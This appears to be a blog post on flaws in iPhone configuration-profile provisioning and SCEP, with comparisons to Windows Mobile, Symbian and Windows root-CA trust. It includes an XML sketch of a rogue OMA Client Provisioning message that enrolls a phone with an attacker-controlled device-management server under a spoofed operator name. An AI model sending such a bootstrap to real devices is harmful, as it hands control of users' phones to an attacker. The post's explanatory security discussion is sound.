I’m not the only one taking a look at provisioning the iPhone. My focus was on showing it working, though, not on a complete analysis of the low-level details. Good thing someone else did that, then 🙂
Head over to http://cryptopath.wordpress.com/2010/01/29/iphone-certificate-flaws/ and you can see that there are a few things that aren’t perfect with how Apple implemented settings provisioning. The reason I’m mentioning it here is that not only did I find the article quite interesting, but I also took the time to comment on it, and thought I’d elaborate on some points further here.
Apple has not implemented provisioning and SCEP properly – we can probably agree on that right off the bat. I have not tested all the variations of signed/unsigned/verified/unverified/etc. When I tested provisioning a signed profile from an unverified source (I signed it with a certificate from my own CA, which is not in the trusted store), the profile did not install without also doing a SCEP enrollment against the CA. (So an attacker with malicious intent would also have to set up a CA.) The behavior might be slightly different with a trusted signer. Still, the attack of signing up for trial VeriSign certificates relies on classic social engineering as its working element. If your users blindly accept provisioning profiles, you have a problem regardless of how or when Apple fixes its implementation.
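To make the cases explicit, the behavior I observed can be summed up as a small decision table. This is a toy model of my own test results only – not Apple’s actual logic – and the trusted-signer branch is an assumption, since I didn’t test that combination:

```python
# Toy model of the profile-install behavior observed in my tests.
# This is NOT Apple's code; the trusted-signer branch is an
# assumption (untested), and real devices also prompt the user.

def profile_installs(signed: bool, signer_trusted: bool,
                     scep_enrollment_ok: bool) -> bool:
    """Return True if, in my tests, the profile would install."""
    if signed and not signer_trusted:
        # Signed by a CA outside the trust store: the install only
        # completed together with a SCEP enrollment against that CA.
        return scep_enrollment_ok
    # Unsigned profiles and trusted signers come down to the user
    # accepting the prompt -- the social-engineering angle.
    return True

# The case from my test: my own CA, no SCEP enrollment -> no install.
print(profile_installs(signed=True, signer_trusted=False,
                       scep_enrollment_ok=False))  # False
```

The point of the table is the last branch: everything that isn’t blocked outright ends up resting on the user clicking “Install”, which is exactly why blind acceptance is the real problem.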
While part of me wants to add this to the list of reasons why iPhones should not be used in the enterprise, that still would not satisfy all the customers/end users/businesses screaming that they want to use the iPhone. I’m afraid it’s not a big enough showstopper to bring that to a halt. My recommendation would be to evaluate using iPhones as if the flaw didn’t exist. (Yes, you still have to consider the flaw, but it doesn’t detract from the functionality side of things.) You might still reject the iPhone based on other considerations, but that’s another discussion entirely.
The trust issue exists on other platforms too, though. If I wanted to compromise a Windows Mobile device, I could send out an OMA CP message bootstrapping it against an OMA DM server of my choosing, and if I put the name of the mobile operator in the “From” field I’m pretty sure I could fool a user or two into messing up their devices that way. Actually, this would apply to other OMA DM devices too, not only Windows Mobile.
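For illustration, such a rogue bootstrap could look roughly like the fragment below. This is a hedged sketch based on the OMA Client Provisioning document format (APPID `w7` designates OMA DM bootstrap); the server address is made up, and the spoofed operator name the user actually sees travels in the sender field of the push message, not in the document itself:

```xml
<!-- Sketch of an OMA CP document bootstrapping the device against an
     attacker-controlled OMA DM server. The URL is hypothetical. -->
<wap-provisioningdoc version="1.1">
  <characteristic type="APPLICATION">
    <!-- APPID "w7" = OMA Device Management bootstrap -->
    <parm name="APPID" value="w7"/>
    <!-- Display name; mimics the operator's own management service -->
    <parm name="NAME" value="YourOperator Device Management"/>
    <parm name="ADDR" value="http://dm.attacker.example/manage"/>
  </characteristic>
</wap-provisioningdoc>
```

On a real device this would arrive as a WAP push over SMS, and the device would normally require a user PIN or network-shared secret before accepting it – which is precisely the check the social engineering tries to talk the user past.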
Symbian had an issue last year (or was it the year before – I forget) where a malware publisher managed to get their application signed with a trusted root certificate. While I never read a follow-up story detailing a major outbreak of the malware, it certainly had the potential to wreak havoc.
I don’t remember if it was on Windows XP or Windows Vista, but in one of the yearly root CA updates Microsoft removed a bunch of CAs, as the list had grown way beyond what would qualify as a handpicked set of especially trusted certificate authorities. So managing trust isn’t just a challenge in mobility.
I guess what I’m saying is that it’s “just yet another security flaw”. We see these every week on the desktop, and we have procedures for handling them. Mobile devices are no different 🙂
And as much as I disapprove of some of Apple’s choices regarding functionality, vendor lock-in, etc., they are doing the right thing by implementing provisioning to increase the enterprise adoption rate. Let’s hope it’s a work in progress and that it does not stop here.